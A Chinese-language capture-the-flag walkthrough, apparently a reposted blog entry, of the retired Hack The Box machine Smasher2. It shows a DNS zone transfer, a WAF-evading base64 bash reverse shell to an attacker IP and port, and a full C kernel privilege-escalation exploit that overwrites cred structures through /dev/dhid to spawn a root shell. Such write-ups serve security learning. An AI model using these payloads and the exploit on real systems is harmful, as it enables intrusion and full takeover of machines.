其他分享
首页 > 其他分享> > HTB-靶机-Smasher2

HTB-靶机-Smasher2

作者:互联网

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.135

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.135 -o ./Smasher2-autorecon

有dns服务开启,试试区域传送

dig -t axfr smasher2.htb @10.10.10.135

发现好些域名,绑定hosts访问

10.10.10.135 wonderfulsessionmanager.smasher2.htb smasher2.htb root.smasher2.htb

爆破下目录

发现目录backup有敏感文件

先把上面两个文件下载下来放着,访问绑定的hosts域名发现一个登陆窗口

这里卡了很久,本靶机难度还是很高的,后来通过网上的writeup分析上面下载下来的文件,得出如下,具体分析可参考:https://0xdf.gitlab.io/2019/12/14/htb-smasher2.html

得到api接口的请求key值,可以通过此key执行命令,在测试的过程中发现有WAF对常规的命令进行拦截,直接使用绕过WAF的执行命令代码反弹shell

WAF绕过技术
https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0

echo '/bin/bash -i >& /dev/tcp/10.10.14.3/8833 0>&1' | base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg==

原始命令
echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg== | base64 -d | bash

绕过WAF命令
{"schedule":
"ec''ho 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg=='|'b'a''s''e'6'4 -'d'|b'a''s'h"}

为了稳定方便的连接目标靶机,本地生成公钥和私钥,然后通过私钥连接到目标靶机

准备root提权,这里提权需要自己写exploit,具体分析和编写exploit参考:https://0xdf.gitlab.io/2019/12/14/htb-smasher2.html#priv-dzonerzy--root

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>

int main ( int argc, char * const * argv)
{
    printf ( "[+] PID: %d\n" , getpid());
    int fd = open( "/dev/dhid" , O_RDWR);
    if (fd < 0 )
    {
    printf ( "[-] Open failed!\n" );
    return -1 ;
    }

    printf ( "[+] Open OK fd: %d\n" , fd);

    unsigned long size = 0xf0000000 ;
    unsigned long mmapStart = 0x42424000 ;
    unsigned int * addr = ( unsigned int *)mmap(( void *)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0 );

    if (addr == MAP_FAILED)
    {
    perror( "Failed to mmap: " );
    close(fd);
    return -1 ;
    }

    printf ( "[+] mmap OK addr: %lx\n" , addr);
    unsigned int uid = getuid();
    printf ( "[+] UID: %d\n" , uid);

    unsigned int credIt = 0 ;
    unsigned int credNum = 0 ;
    while ((( unsigned long )addr) < (mmapStart + size - 0x40 ))
    {
credIt = 0 ;
    if ( addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid )

    {
    credNum++;
    printf ( "[+] Found cred structure! ptr: %p, credNum: %d\n" , addr, credNum);
    credIt = 0 ;
    addr[credIt++] = 0 ;
    addr[credIt++] = 0 ;
    addr[credIt++] = 0 ;
    addr[credIt++] = 0 ;
    addr[credIt++] = 0 ;
    addr[credIt++] = 0 ;
    addr[credIt++] = 0 ;
    addr[credIt++] = 0 ;
    if (getuid() == 0 )
    {
    puts ( "[+] GOT ROOT!" );
    credIt += 1 ; //Skip 4 bytes, to get capabilities addr
    addr[credIt++] = 0xffffffff ;
    addr[credIt++] = 0xffffffff ;
    addr[credIt++] = 0xffffffff ;
    addr[credIt++ ] = 0xffffffff ;
    addr[credIt++] = 0xffffffff ;
    addr[credIt++] = 0xffffffff ;
    addr[credIt++] = 0xffffffff ;
    addr[credIt++] = 0xffffffff ;
    addr[credIt++] = 0xffffffff ;
    addr[credIt++] = 0xffffffff;
    execl( "/bin/sh" , "-" , ( char *) NULL );
    puts ( "[-] Execl failed..." );
    break ;
    }
    else
    {
    credIt = 0 ;
    addr[credIt++] = uid;
    addr[credIt++] = uid;
    addr[credIt++] = uid;
    addr[credIt++] = uid;
    addr[credIt++] = uid;
    addr[credIt++] = uid;
    addr[credIt++] = uid;
    addr[credIt++] = uid;
    }
    }
    addr++;
    }
    puts ( "[+] Scanning loop END" );
    fflush( stdout );
    int stop = getchar();
    return 0 ;
}

通过本地kali编译完成之后再使用scp传到目标靶机执行exploit提权

标签:Smasher2,int,HTB,++,credIt,0xffffffff,uid,靶机,addr
来源: https://www.cnblogs.com/autopwn/p/14261304.html